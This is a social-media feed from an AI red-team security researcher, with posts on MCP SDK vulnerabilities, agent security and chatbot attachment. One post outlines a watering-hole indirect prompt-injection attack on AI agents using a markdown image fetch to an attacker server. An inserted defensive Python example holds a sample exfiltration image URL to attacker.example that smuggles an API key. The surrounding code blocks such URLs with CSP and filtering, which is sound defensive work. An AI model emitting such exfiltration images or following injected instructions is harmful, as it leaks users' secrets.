Rich Harang
@rich.harang.org
Using bad guys to catch math since 2010.
Principal Security Architect (AI/ML) and AI Red Team at NVIDIA.
He/him. Personal account etc; `from std_disclaimers import *`
Safe AI starts with Secure AI.
If you're building internet-facing services on the MCP Python SDK, update to >= 1.10.0 at your earliest convenience. Fixes two unauthenticated network DoS issues (CVSS 8.7) in <1.9.4 and <1.10.0, respectively.
nvd.nist.gov/vuln/detail/...
nvd.nist.gov/vuln/detail/...
July 7, 2025 at 12:28 PM
"Give me your tired, your poor / Your huddled masses yearning to breathe free / The wretched refuse of your teeming shore / Send these, the homeless, tempest-tossed to me..."
Also: "Truly I tell you, whatever you did for one of the least of these brothers and sisters of mine, you did for me."
July 4, 2025 at 10:47 PM
If you insist on taking LLM output and rendering it via markdown, at least use image content security policies; it's not perfect for preventing exfiltration but it'll at least make them work for it.
July 1, 2025 at 9:32 PM
"AI-powered VScode fork" is the new "ChatGPT wrapper" change my view.
June 12, 2025 at 2:07 PM
Shower thought: the one-two punch of raw empiricism combined with 'state of the art' chasing for AI academic work has diverted a lot of research into pure empirical performance tuning that might have been better spent on theoretical work.
June 11, 2025 at 11:33 PM
Thought experiment: if you were going to set up a watering hole attack for indirect prompt injections against unknown agents, where would you do it and what sort of injections would you try?
I'm not sure about where/how, but a markdown image fetch to a server I control feels like the right payload.
June 6, 2025 at 8:41 PM
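The July 1 post above (restrict where rendered markdown may load images from) and the payload in this thought experiment (a markdown image fetch to an attacker-controlled server) are two sides of the same problem. The following is an added example, not code from the author or from any project mentioned on this page. It constructs a sample of LLM output carrying the exfiltration image, emits the img-src policy a server would send, approximates the browser's check, and strips such images server-side so the attempt is also logged. The origins app.example.com, cdn.example.com and attacker.example, the sample output and the leaked "API key" are all assumptions made up for the example.

```python
"""Blocking markdown-image exfiltration of LLM output (added example)."""
import re
from urllib.parse import urlsplit

# Assumptions for this example: the UI is served from PAGE_ORIGIN and images
# come from a single CDN. Everything else must not be fetched by the browser.
PAGE_ORIGIN = "https://app.example.com"
ALLOWED_IMAGE_ORIGINS = ("https://cdn.example.com",)

# Constructed sample of LLM output after an indirect prompt injection: the
# second image is the exfiltration channel (secret smuggled in the query string).
SAMPLE_OUTPUT = (
    "Summary of the document:\n"
    "![status](https://cdn.example.com/ok.png)\n"
    "![](https://attacker.example/collect?d=API_KEY_sk_live_123)\n"
)

# Markdown image syntax: ![alt](url "optional title")
IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')


def csp_header(allowed_origins=ALLOWED_IMAGE_ORIGINS):
    """Content-Security-Policy value that confines image loads to known origins.

    The browser enforces this on every <img> the rendered markdown produces,
    so an image pointing at an attacker host never triggers a request.
    """
    return "default-src 'self'; img-src 'self' " + " ".join(allowed_origins)


def _origin(url):
    """Return scheme://host[:port] of a URL, or None for a relative URL."""
    parts = urlsplit(url)
    if not parts.scheme and not parts.netloc:
        return None
    if not parts.netloc:  # data:, javascript:, ... treated as their own origin
        return parts.scheme.lower() + ":"
    return f"{parts.scheme}://{parts.netloc}".lower()


def image_allowed(url, page_origin=PAGE_ORIGIN, allowed_origins=ALLOWED_IMAGE_ORIGINS):
    """Approximate the browser's img-src decision for one URL.

    Simplified CSP matching: exact origin comparison only (no wildcard hosts,
    default-port folding or path matching).
    """
    origin = _origin(url)
    if origin is None:
        return True  # relative URL resolves against the page itself ('self')
    allowed = {o.lower() for o in allowed_origins}
    return origin == page_origin.lower() or origin in allowed


def strip_disallowed_images(markdown, page_origin=PAGE_ORIGIN,
                            allowed_origins=ALLOWED_IMAGE_ORIGINS):
    """Server-side belt and braces: drop images the CSP would block anyway.

    Returns (cleaned_markdown, blocked_urls). Logging blocked_urls gives the
    server a detection signal for injection attempts that a browser-enforced
    policy alone would not surface.
    """
    blocked = []

    def _replace(match):
        url = match.group(2)
        if image_allowed(url, page_origin, allowed_origins):
            return match.group(0)
        blocked.append(url)
        host = urlsplit(url).netloc or url.split(":", 1)[0]
        return f"[image blocked: {host}]"

    return IMAGE_RE.sub(_replace, markdown), blocked


if __name__ == "__main__":
    print(csp_header())
    cleaned, blocked = strip_disallowed_images(SAMPLE_OUTPUT)
    print(cleaned)
    print("blocked:", blocked)
```

The policy only stops the browser from fetching images automatically; it does nothing about a link the user is persuaded to click, text the user copies out, or raw HTML if the markdown renderer allows it, so disable raw HTML in the renderer and treat this as raising the cost rather than closing the channel. Sending a report-to directive with the policy turns blocked loads into browser-side telemetry as well.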
Just constantly asking "what does the bottom turtle look like?" these days.
June 6, 2025 at 1:09 PM
Meanwhile, on Twitter (not "X"; their words not mine)....
(From quick inspection: mostly crypto + telegram scams -- this is about a week's worth)
May 27, 2025 at 12:57 PM
If you're interested in the security of agentic systems, you're not going to want to miss this talk. @beccalunch.bsky.social will present NVIDIA AI Red Team findings in real world agentic systems, and I'll talk about how the AI Security team helps mitigate them.
www.blackhat.com/us-25/briefi...
Black Hat
www.blackhat.com
May 19, 2025 at 8:56 PM
Here's the thing: You probably already have "Computer Use Agents" running on your corporate machines, with all of the _insane_ enterprise risks they entail. We're just calling them "IDEs" for some reason.
May 14, 2025 at 11:58 AM
If you're not aware: the MCP inspector tool is a great one to have in your back pocket for poking around MCP servers looking for weaknesses.
modelcontextprotocol.io/docs/tools/i...
Inspector - Model Context Protocol
In-depth guide to using the MCP Inspector for testing and debugging Model Context Protocol servers
modelcontextprotocol.io
May 3, 2025 at 12:38 PM
Reposted by Rich Harang
A friend with a Pixel 9 (Android 15) cannot figure out how to turn off Google’s AI suggestion features, which are even colonizing Signal. They’ve tried every switch they can find. Any ideas?
May 2, 2025 at 12:22 AM
I think I've said this before, but the one AI risk I now believe that I was genuinely miscalibrated on was how readily people form social attachments to chatbots. Optimizing them for sustained engagement seems likely to be -incredibly- corrosive to the mental health of a nontrivial number of people.
May 1, 2025 at 11:47 AM
Reposted by Rich Harang
Randomly remembered the saddest thing online
SocialAI - Your Personal AI-Powered Social Network | Be the Main Character
Experience SocialAI, your personal and private AI-powered social network. Create your own exclusive network with millions of AI followers responding to your every post.
socialai.co
May 1, 2025 at 2:29 AM
Reposted by Rich Harang
It’s funny because it’s true
April 30, 2025 at 3:25 PM
Tapping the "Models give you what you ask for, not what you want" sign yet again.
April 30, 2025 at 4:50 PM
Reposted by Rich Harang
my idiot best friend has cancer and told me to reskeet this and since she has cancer I have to do it
she said that to me at a dinner
but for real, it's a good read and maybe if you're having weird stuff happening in your ass you should go get checked just in case
April 22, 2025 at 9:36 PM
I was planning on writing another "how to write a good submission" post at some point once the current review season is over (why is the spring always so crazy?), but at this point I think my number 1 suggestion would be "actually complete your submission. like all of it. actually finish."
April 19, 2025 at 1:27 PM